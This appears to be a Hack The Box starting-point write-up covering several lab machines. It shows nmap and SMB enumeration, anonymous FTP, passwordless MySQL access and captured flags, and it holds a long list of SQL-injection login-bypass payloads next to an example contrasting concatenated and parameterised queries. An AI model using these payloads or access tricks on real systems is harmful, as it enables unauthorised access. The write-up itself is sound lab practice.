1. Connect to the VPN
Connect using openvpn; it needs sudo, which seems a bit odd, since it wasn't needed before.
1 | ┌──(kali㉿kali)-[~/Desktop] |
2. Process
得到目标ip:10.129.148.244
nmap:
1 | ──(kali㉿kali)-[~/Desktop] |
telnet test:
1 | ──(kali㉿kali)-[~/Desktop] |
3. Success
Fawn
10.129.150.22:
1 | ──(kali㉿kali)-[~] |
Connected to FTP as the anonymous
user to get the flag.txt:
1 | ┌──(kali㉿kali)-[~] |
Dancing
10.129.150.33:
─$ nmap -sC -sV 10.129.150.33 127 ⨯ 1 ⚙
└─$ smbclient -L 10.129.150.33 1 ⨯ 1 ⚙
1 | ──(kali㉿kali)-[~] |
Appointment
SQL, basic, 10.129.150.95
The nmap scan shows port 80 open for httpd; it's a login web page.
Brute-forcing directories with dirb gave no result.
Test SQL basics:
username: admin' #
got flag!
e3d0796d002a446c0e622226f42e9672
SQL basics:
1' OR '1'='1
' or 1='1
'or'='or'
admin
admin'--
admin' or 4=4--
admin' or '1'='1'--
admin888
"or "a"="a
admin' or 2=2#
a' having 1=1#
a' having 1=1--
admin' or '2'='2
')or('a'='a
or 4=4--
c
a'or' 4=4--
"or 4=4--
'or'a'='a
"or"="a'='a
'or''='
'or'='or'
1 or '1'='1'=1
1 or '1'='1' or 4=4
'OR 4=4%00
"or 4=4%00
'xor
admin' UNION Select 1,1,1 FROM admin Where ''='
1
-1%cf' union select 1,1,1 as password,1,1,1 %23
1
17..admin' or 'a'='a (any password)
'or'='or'
'or 4=4/*
something
' OR '1'='1
1'or'1'='1
admin' OR 4=4/*
1'or'1'='1
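Why the `admin' #` username logs in on Appointment, and what closes the hole, as an added example (not code from this write-up or from the target box). The table, the password value and the function names are assumptions; SQLite stands in for the box's database, and because `#` is MySQL comment syntax that SQLite lacks, the list's `admin'--` entry is used instead.

```python
import sqlite3

def make_db():
    # Constructed sample data: one account in an in-memory SQLite database.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'S3cret-constructed')")
    return db

def login_concat(db, username, password):
    # Vulnerable form: input is pasted into the SQL text, so a quote in
    # `username` closes the string literal and the rest is parsed as SQL.
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # the input produced malformed SQL

def login_param(db, username, password):
    # Hardened form: placeholders keep input as data, so quotes and comment
    # markers are compared literally against the stored username.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None

def compare(attempts):
    # Returns (username, result of concatenated query, result of bound query).
    db = make_db()
    return [(u, login_concat(db, u, p), login_param(db, u, p))
            for u, p in attempts]

if __name__ == "__main__":
    attempts = [
        ("admin", "S3cret-constructed"),  # legitimate login
        ("admin", "wrong"),               # wrong password
        ("admin'--", "wrong"),            # comment removes the password check
    ]
    for row in compare(attempts):
        print(row)
```

With the concatenated query the third attempt is accepted because the statement ends at `username = 'admin'`; with bound parameters the same input is just a username that does not exist.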
Install gobuster:
sudo apt install golang-go -y
sudo apt install gccgo-go -y
go install github.com/OJ/gobuster/v3@latest
Sequel
rustscan:
└─$ rustscan --help 1 ⚙
scan result:
1 | ┌──(kali㉿kali)-[~] |
mysql -h 10.129.150.160 -u root
mysql> show databases;
mysql> use htb;
mysql> show tables;
mysql> select * from config;
then got flag.
mysql cheat-sheet: https://www.mysqltutorial.org/mysql-cheat-sheet.aspx
Crocodile
10.129.151.56
rustscan: 21, 80
then use nmap to scan the specific ports:
1 | ┌──(kali㉿kali)-[~] |
anonymous login to ftp: get user/pwd lists.
userlist:
aron
pwnmeow
egotisticalsw
admin
pwdlist:
root
Supersecretpassword1
@BaASD&9032123sADS
rKXM59ESxesUFHAd
use admin/rKXM59ESxesUFHAd to login at http://10.129.151.56/login.php , then got flag!
c7110277ac44d78b6a9fff2232434d16.